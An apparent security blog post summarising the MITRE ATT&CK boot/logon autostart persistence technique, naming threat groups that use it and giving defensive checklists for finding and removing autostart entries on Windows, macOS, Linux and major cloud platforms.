Boot or Logon Autostart Execution (T1547)

Written By Jeremy Pickett

MITRE ATT&CK - T1547: Boot or Logon Autostart Execution

MITRE ATT&CK's technique "T1547 - Boot or Logon Autostart Execution" encompasses methods adversaries use to execute malicious code automatically during the system's boot-up or logon process. Here’s a technical history of notable incidents, timelines, people, and groups associated with this technique:

Notable Attacks and Groups

1. APT28 (Fancy Bear)

  • Timeline: Ongoing since at least the mid-2000s.

  • Details: Associated with Russian intelligence services, APT28 has used registry run keys and startup folders to ensure their malware runs upon system start.

  • Notable Incidents: In 2016, APT28 used this technique in their campaign targeting the Democratic National Committee (DNC).

2. FIN7 (Carbanak Group)

  • Timeline: Active since at least 2013.

  • Details: FIN7 leverages boot or logon autostart techniques, frequently using registry keys to maintain persistence on victim systems.

  • Notable Incidents: April 2017: FIN7 used these techniques in intrusions targeting the hospitality and retail sectors.

3. Lazarus Group

  • Timeline: Active since at least 2009.

  • Details: Linked to North Korea, the Lazarus Group uses boot or logon autostart execution to deploy destructive payloads, often modifying Windows autostart extensibility points.

  • Notable Incidents: In 2017, the WannaCry ransomware attack demonstrated this technique to ensure malware execution upon boot.

4. Turla (Waterbug, Venomous Bear)

  • Timeline: Active since at least 2004.

  • Details: Turla uses various forms of this technique, including new services and registry modifications.

  • Notable Incidents: In 2018, operations against European government agencies involved autostart registry keys to maintain and recover access.

Techniques and Tools

  • Registry Run Keys / Startup Folder: Use of Windows registry (e.g., HKCU\Software\Microsoft\Windows\CurrentVersion\Run) and startup folders to execute payloads at boot or logon.

  • Scheduled Tasks: Creation of scheduled tasks to execute payloads at specified times or during specific system events.

  • Service Creation: Creating or modifying system services to run malicious code at boot time.

  • Group Policies: Leveraging group policy objects to deploy malicious scripts or binaries during startup.

Publicly Available Tools

  • AutoRuns (Sysinternals): A legitimate tool often repurposed by adversaries to manage autoruns on Windows systems.

  • Persistence Sniper: Open-source tool used for detecting common persistence mechanisms in Windows.

Windows Environments

  1. Identify Autostart Program Locations:

    • Check Registry: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`, `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`

    • Use Task Manager or Autoruns for Windows.

  2. Analyze and Review Entries:

    • Compare against known software and standards.

    • Use VirusTotal for unknown entries.

  3. Remove Unauthorized Entries:

    • Use `regedit` for registry changes.

    • Use Autoruns to manage entries.

  4. Use Group Policy for Restrictions:

    • Configure policies like `Do not process the legacy run list` and `Run only allowed Windows applications`.

MacOSX

  1. Identify Autostart Items:

    • Check `System Preferences` -> `Users & Groups` -> `Login Items`.

    • Inspect `/Library/LaunchAgents`, `/Library/LaunchDaemons`, `~/Library/LaunchAgents`.

  2. Review and Vet Autostart Items:

    • Validate items against approved applications.

    • Use `launchctl list` for active agents/daemons.

  3. Remove Unauthorized Items:

    • Use `launchctl remove ` to stop agents/daemons.

    • Delete corresponding `.plist` files.

  4. Implement Configuration Profiles:

    • Manage startup programs via Configuration Profiles.

Linux

  1. Inspect Startup Scripts and Services:

    • Check initialization directories: `/etc/init.d/`, `/etc/systemd/system/`, `/etc/rc.local`, `~/.config/autostart/`.

  2. Validate and Investigate Entries:

    • Ensure entries are trusted.

    • Check file ownership and integrity with `ls -l` and `stat`.

  3. Remove Suspicious Entries:

    • Disable services: `systemctl disable ` & `systemctl stop `.

    • Remove unauthorized scripts; edit user crontabs.

  4. Configure Security Policies:

    • Enforce policies with SELinux or AppArmor.

Amazon AWS

  1. Audit IAM Roles and Policies:

    • Review permissions for instance profiles.

  2. Inspect User Data and Initialization Scripts:

    • Check for suspicious commands/scripts in EC2 instances.

  3. Remove or Restrict Unauthorized Configurations:

    • Modify/delete suspicious user data scripts with AWS CLI.

  4. Use AWS Config and CloudTrail:

    • Monitor changes with AWS Config rules and CloudTrail.

Google Cloud Platform

  1. Examine VM Metadata:

    • Review `startup-script` and `startup-script-url` metadata.

  2. Verify and Vet Scripts:

    • Ensure metadata scripts are approved.

  3. Remove Malicious Metadata Entries:

    • Use `gcloud` commands to update or remove metadata entries.

  4. Leverage Security Command Center:

    • Enable the Security Command Center to monitor VM configurations.

Microsoft Azure

  1. Review VM Extensions and Scripts:

    • Check VM extensions and custom scripts via Azure portal or CLI.

  2. Analyze and Authorize Extensions:

    • Cross-reference with approved configurations using `az vm extension list`.

  3. Disable or Remove Unauthorized Extensions:

    • Remove unauthorized extensions/scripts with Azure portal or CLI.

  4. Monitor with Azure Security Center:

    • Detect configuration drifts using Azure Security Center.

Jeremy Pickett
Previous

Unsecured Credentials (T1552.001)
Next

Usage-Triggered Execution (T1546.015)